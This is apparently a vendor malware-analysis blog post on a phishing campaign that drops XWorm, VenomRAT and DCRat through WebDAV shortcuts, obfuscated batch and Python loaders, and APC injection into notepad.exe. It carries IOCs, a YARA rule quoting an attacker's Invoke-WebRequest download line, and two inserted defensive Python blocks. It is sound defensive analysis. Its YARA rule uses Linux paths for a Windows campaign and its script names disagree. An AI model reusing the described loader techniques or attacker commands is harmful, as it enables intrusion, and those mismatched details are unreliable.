PythonRatLoader: The Proprietor of XWorm and Friends

October 30, 2024


Authors: Adam Martin and Kian Buckley Maher

Introduction

The Cofense Phishing Defense Center (PDC) has uncovered a sophisticated attack that leveraged multiple layers of obfuscation and evasion techniques to distribute and execute VenomRAT. However, this attack campaign didn’t end with VenomRAT because the subsequently loaded plugin continued to deploy various types of malware into the victim’s environment.

Additionally, the PDC team recently identified a phishing campaign that uses multiple layers of evasion techniques to deploy various malware into an infected environment. This campaign is aimed at employees and poses as a customer requesting a service. The email uses urgent language to deceive a victim into clicking a malicious attachment, initiating a series of harmful activities, and deploying several types of malware. All the malware in this attack uses the same packing and obfuscation techniques. The deployed malware includes XWorm, VenomRAT, AsyncRAT, and DCRat. 

As illustrated in Figure 1, our initial threat vector is a download link to a “PDF” file purporting to be a general invoice, luring the potential victim into accessing the malicious URL. 


Figure 1 Initial Threat Vector

Once accessed, an internet shortcut file will be automatically downloaded to the default downloads directory. This shortcut file is used to navigate the victim to the remote server. This is possible because Windows Explorer permits browsing through the WebDAV protocol, which allows users to access, edit, and download from remotely hosted web servers.


Figure 2 Internet Shortcut File

The file:// URL points to a WebDAV service hosted via Cloudflare's tunneling system. By opening the shortcut, a user would have remote file access to the /Dev directory over SSL/TLS, as illustrated in Figure 2. 

While conducting this analysis, the base URL hosting the content was accessible, as per Figure 3. 


Figure 3 Hosted Malicious Directory

Once the shortcut file is accessed, the user is presented with a network directory view. The “PDF” being displayed is, in fact, being accessed via the WebDAV protocol on the hosted server rather than being stored locally.


Figure 4 "PDF" File Download to Network Folder

The “PDF” is really a PowerShell script which does the following:

  • Uses PowerShell to download and execute a batch script from a remote server via a hidden command.
  • Fetches the batch script from a Cloudflare-hosted URL (principles-yours-respected-skirt[.]trycloudflare[.]com), using the same WebDAV method as the first URL.
  • Employs Invoke-Expression (iex) to run the batch file’s contents, achieving remote code execution.
  • Uses directory traversal and hidden window flags to evade detection.


Figure 5 Extracted script

This will prompt a download via msedge.exe for corn.bat, which is obfuscated with BatchShield, an open-source batch script obfuscator available on GitHub. The obfuscated version and deobfuscated version can be found in Figures 5 and 6, respectively. BatchShield uses a simple form of string obfuscation where % symbols and obfuscated characters replace meaningful batch script commands and variables. 

Breakdown:

  1. The script looks for PDF files in the downloads folder and sets the first one it finds as the variable pdfFile.
  2. Once a file is found, it opens the file using the start command.
  3. The script then sets a URL for a ZIP file download (zipUrl) and a download location (destination).
  4. Using PowerShell's Invoke-WebRequest, it attempts to download the ZIP file from the given URL to the specified location. In this case, the Python 312 folder is downloaded and hidden in AppData/Roaming.

 


Figure 6 Obfuscated corn.bat


Figure 7 Decoded corn.bat

Breakdown: 

  • PDF File Search: The script searches the user's downloads folder for any files with a .pdf extension, using a for loop to iterate over the found files.
  • Variable Assignment: Upon finding a PDF file, it assigns the path of the first PDF file found to the variable pdfFile and immediately jumps to the openPdf label to execute the subsequent commands.
  • Open PDF: The script prints a message indicating the PDF file is being opened and uses the start command to open the file with the default PDF viewer on the system.
  • ZIP File Variables: It defines a URL (zipUrl) for a ZIP file to be downloaded and specifies a destination path (destination) in the downloads folder where the ZIP file will be saved.
  • Download ZIP File: Using PowerShell, the script attempts to download the ZIP file from the specified URL and save it to the designated location, handling any potential errors during the download process with a try-catch block to exit if an error occurs.
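A small static deobfuscator for the percent-variable scheme described above, added here as an example; it is not BatchShield's own tool or the authors' code. It assumes the obfuscation takes two forms: real commands split into fragments stored with `set` and reassembled through %var%, plus junk references to variables that were never defined, which cmd.exe expands to nothing. The sample script is constructed in that style and is not the real corn.bat.

```python
import re

# Assumed scheme: set-stored fragments stitched back via %var%, plus junk
# references to undefined variables. Real environment variables are kept as
# references so paths such as %APPDATA%\... stay readable for the analyst.
KEEP_ENV = {"appdata", "localappdata", "userprofile", "temp", "tmp",
            "systemroot", "programdata", "username", "computername"}
_SET = re.compile(r'^\s*set\s+"?([^=\s"]+)=(.*?)"?\s*$', re.IGNORECASE)

def _expand(text, defined):
    """One left-to-right pass mimicking cmd.exe percent expansion in a batch file."""
    out, i, n = [], 0, len(text)
    while i < n:
        if text[i] != "%":
            out.append(text[i]); i += 1; continue
        if i + 1 < n and text[i + 1] == "%":      # %% is a literal % (for-loop vars)
            out.append("%%"); i += 2; continue
        j = text.find("%", i + 1)
        if j == -1:                                # lone %, dropped by cmd in batch mode
            i += 1; continue
        name = text[i + 1:j].lower()
        if name in KEEP_ENV:                       # real env var: keep the reference
            out.append(text[i:j + 1])
        else:                                      # defined fragment, or junk -> ""
            out.append(defined.get(name, ""))
        i = j + 1
    return "".join(out)

def deobfuscate_batch(script):
    """Resolve fragments line by line; set lines are kept so URLs/paths stay visible."""
    defined, cleaned = {}, []
    for raw in script.splitlines():
        line = _expand(raw, defined)               # cmd expands before it parses the line
        m = _SET.match(line)
        if m:
            defined[m.group(1).lower()] = m.group(2)
            cleaned.append(f"set {m.group(1)}={m.group(2)}")
        elif line.strip():
            cleaned.append(line)
    return "\n".join(cleaned)

# Constructed sample in the post's style (not the real corn.bat); the URL is a dummy.
OBFUSCATED_SAMPLE = r'''@echo off
set "a=pow"
set "b=ershell"
set u=https://example.invalid/corn.zip
%Qx%%a%%b% -c "Invoke-WebRequest -Uri %u% -OutFile %Zz%%APPDATA%\Python312\corn.zip"
for %%f in (%USERPROFILE%\Downloads\*.pdf) do %Qx%start "" "%%f"
'''
```

Delayed-expansion (!var!) syntax is not handled; extend `_expand` if a sample uses it.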

The embedded Python payload contains a mix of standard Python dependencies along with three payload files, as per Figure 8. The ones of concern are xw.py, xo.py, and ch.py. 


Figure 8 Python 312 Payload

 

A new .bat file is downloaded, which contains all of the components necessary for a modular and multistage attack to take place. 


Figure 9 Update.bat used to run Python Payload

Update.bat breakdown: 

  • The script checks if it's already running with a flag (MY_FLAG). If not, it restarts itself in a minimized window.
  • It changes the working directory to a specific Python folder in downloads.
  • It runs three Python scripts sequentially: ch.py (DCRAT), ex.py (VenomRAT), and xw.py (XWorm).
  • It terminates the cmd.exe process to close the command window.

From here, we can analyze the running process of xw.py, the malicious Python script payload for XWorm. The script is heavily obfuscated using “KRAMER,” an open-source Python script obfuscator. When running the script in isolation, the command prompt will remain open, allowing us to analyze a snippet of the methodology used for shellcode injection as per Figure 10. 


Figure 10 Shellcode Injection

This is achieved through a process injection method known as Early Bird APC (asynchronous procedure call) injection. In essence, the script creates a new process (notepad.exe in this case) and queues the malicious code into it before the main thread begins executing. This is done to evade antivirus detection, since antivirus software is less likely to catch this behavior so early in the application initialization phase.

From here, we can analyze the memory strings of xw.py to bypass some of the encryption and view its instructions at run time. 


Figure 11 Decrypted xw.py snippet

  • Shellcode Decryption: The function rc4_decrypt is called with the encoded key and encrypted_data to obtain the decrypted shellcode.
  • Memory Allocation: A mutable memory buffer is created using ctypes.create_string_buffer to store the decrypted shellcode.
  • Memory Permission Adjustment: The VirtualProtect Windows API call is used to change the memory permissions of the buffer to PAGE_EXECUTE_READWRITE, allowing execution of the shellcode.
  • Shellcode Execution: The decrypted shellcode is cast to a callable function and executed.

 


Figure 12 Process Injection to Notepad.exe

Examining the memory strings of this process at runtime allows us to confirm that this sample makes an outbound connection request to an XWorm C2, along with string references to XWorm. It’s worth noting that each Python script will execute and inject into an individual notepad.exe process. The related notepad.exe processes were seen to be DCRAT and VenomRAT.
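Turning the chain described above (update.bat launching the Python scripts from the dropped Python312 folder, each injecting into its own notepad.exe that then connects out) into detection logic, as an added example that is not part of the original post: it walks constructed Sysmon-style process-creation and network-connection records, flags notepad.exe children of a python.exe running from a user-writable directory, and raises severity when that notepad.exe opens a network connection. The event field names and the sample records are assumptions.

```python
# Added example (not the authors' tooling): detection logic for the chain the post
# describes, update.bat -> python.exe (from AppData\Roaming) -> notepad.exe -> C2.
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\", "\\downloads\\")

def _python_from_user_dir(proc):
    image = proc["image"].lower()
    return image.endswith("\\python.exe") and any(d in image for d in USER_WRITABLE)

def find_injection_chains(events):
    """Flag notepad.exe spawned by a user-directory python.exe; escalate on network use."""
    procs = {e["pid"]: e for e in events if e["type"] == "process_create"}
    conns = {}
    for e in events:
        if e["type"] == "network_connect":
            conns.setdefault(e["pid"], []).append(e["dest"])
    findings = []
    for pid, proc in procs.items():
        if not proc["image"].lower().endswith("\\notepad.exe"):
            continue
        parent = procs.get(proc["ppid"])
        if parent is None or not _python_from_user_dir(parent):
            continue
        dests = conns.get(pid, [])
        findings.append({
            "script": parent["cmdline"].split()[-1],  # e.g. xw.py / ch.py
            "notepad_pid": pid,
            "dests": dests,
            # notepad.exe has no legitimate reason to talk to the network
            "severity": "high" if dests else "medium",
        })
    return findings

# Constructed Sysmon-style events (not real telemetry); the IP is a documentation address.
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 100, "ppid": 1, "cmdline": r"cmd.exe /c update.bat",
     "image": r"C:\Windows\System32\cmd.exe"},
    {"type": "process_create", "pid": 200, "ppid": 100, "cmdline": "python.exe xw.py",
     "image": r"C:\Users\u\AppData\Roaming\Python312\python.exe"},
    {"type": "process_create", "pid": 201, "ppid": 200, "cmdline": "notepad.exe",
     "image": r"C:\Windows\System32\notepad.exe"},
    {"type": "network_connect", "pid": 201, "dest": "203.0.113.5:7000"},
    {"type": "process_create", "pid": 300, "ppid": 100, "cmdline": "python.exe ch.py",
     "image": r"C:\Users\u\AppData\Roaming\Python312\python.exe"},
    {"type": "process_create", "pid": 301, "ppid": 300, "cmdline": "notepad.exe",
     "image": r"C:\Windows\System32\notepad.exe"},
    {"type": "process_create", "pid": 401, "ppid": 50, "cmdline": "notepad.exe notes.txt",
     "image": r"C:\Windows\System32\notepad.exe"},  # benign: parent is not python.exe
]
```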

 


Figure 12 Spawned Notepad Processes


Figure 13 XWorm String Detected via YARA Rule Match


Figure 14 Confirmation of XWorm from xw.py 


Attack Flow

(Figure: attack flow diagram)

Conclusion

While the methods deployed in this attack are nothing new in the world of malicious loaders, the way they are combined here shows an increased level of complexity. The use of several real/fake file types, along with silent PowerShell execution and significant code obfuscation, gives PythonRATLoader the ability to enter victim systems and cause serious damage to any infected organization before the attack can be caught and isolated by traditional endpoint monitoring, detection, and remediation systems.

In our investigation we took a deep dive into the activity spawned by the ‘xw.py’ script, but the other two payloads spawn their own ‘Notepad.exe’ instances and inject different shellcode by abusing the same APC queue technique: ‘ch.py’ spawns a version of DCRAT and ‘ex.py’ spawns a version of VenomRAT. Each of these is incredibly destructive in its own way.

The Cofense PDC recommends maintaining a high level of email security awareness among users to prevent attacks like this because the initial infection vector continues to be very well-crafted phishing emails that, through their perceived innocuous nature, lull users into a false sense of security. Once access is gained, detection and remediation become significantly more time-consuming and costly. 

It is important to teach users to be highly aware of any emails being received containing: 

  • Unexpected ZIP/HTML/Office Doc files.
  • URLs not used in regular day-to-day operations.
  • Urgent, sympathetic, or threatening language.
  • Differences in writing styles used by senders known to the user.
  • Unusual/unexpected email addresses from free providers such as Gmail, Yahoo, and Yandex.
  • Aliases that have no relation to the email address used or the context in which it was received.

These are common tactics used in malicious emails of any type, ranging from Malware to BEC (Business Email Compromise), and knowing how to recognize them can save an organization from serious damage. Suspicions of any kind should be reported to your security team immediately for awareness and remediation.

Teach your employees to spot these attacks and prevent them at the source with Cofense’s comprehensive suite of email Reporting and Response Tools, Phishing Simulations, and PhishMe Security Awareness Training (SAT).

MITRE ATT&CK

PythonRATLoader

Technique | ID | Description | Tactic
Command and Scripting Interpreter: PowerShell | T1059.001 | The RATLoader will execute silent PowerShell commands. | Execution
Phishing | T1566 | The initial infection vector noted in our investigation is an impersonal phishing email. | Initial Access
User Execution: Malicious Link/Malicious File | T1204 | The initial payload is pulled using a malicious URL present in the phishing email. | Execution
Deobfuscate/Decode Files or Information | T1140 | The initial .bat file is heavily obfuscated to prevent detection by automated systems and to slow analysis. | Defense Evasion
Command and Scripting Interpreter: Python | T1059.006 | The Python dependencies needed for execution are included in the malicious .zip file. | Execution

XWorm

Technique | ID | Description | Tactic
Command and Scripting Interpreter: PowerShell | T1059.001 | XWorm will gain initial persistence using silent PowerShell commands. | Execution
Process Discovery | T1057 | XWorm will pull system information about running programs. | Discovery
Account Discovery | T1087 | XWorm will pull account information present on the victim machine. | Discovery
Browser Information Discovery | T1217 | XWorm will pull information present in the browser and store it for exfiltration. | Discovery
Input Capture: Keylogging | T1056.001 | User interactions with keyboards and other peripherals are logged and stored for exfiltration by XWorm. | Collection
Privilege Escalation | T1068 | XWorm will attempt to bypass account controls and give itself administrator access. | Privilege Escalation
Boot or Logon Autostart Execution | T1547 | XWorm will add itself to start-up programs. | Persistence
Exfiltration Over C2 Channel | T1041 | XWorm will exfiltrate all collected information over an encrypted C2 connection. | Exfiltration

 

YARA Rule

strings:
    $file1 = "/usr/bin/python /tmp/ch.py"
    $file2 = "xterm -hold -e /usr/bin/python /tmp/ch.py"
    $file3 = "/usr/bin/python /tmp/xw.py"
    $file4 = "xterm -hold -e /usr/bin/python /tmp/xw.py"
    $powershell1 = "Invoke-WebRequest -Uri 'https://principles-yours-respected-skirt.trycloudflare.com/"

condition:
    any of ($file*) or $powershell1

 

IOCs

URL | IP Address
hXXps://principles-yours-respected-skirt[.]trycloudflare[.]com/ | 104.16.231.132
hXXps://dl[.]dropboxusercontent[.]com/scl/fi/uc4m6iiv8h3raopsr6xd0/RE019290049022PDF.zip | 162.125.3.15
file://puzzle-photographers-nitrogen-rod[.]trycloudflare[.]com@SSL/DavWWWRoot/DE | 104.16.231.132

 
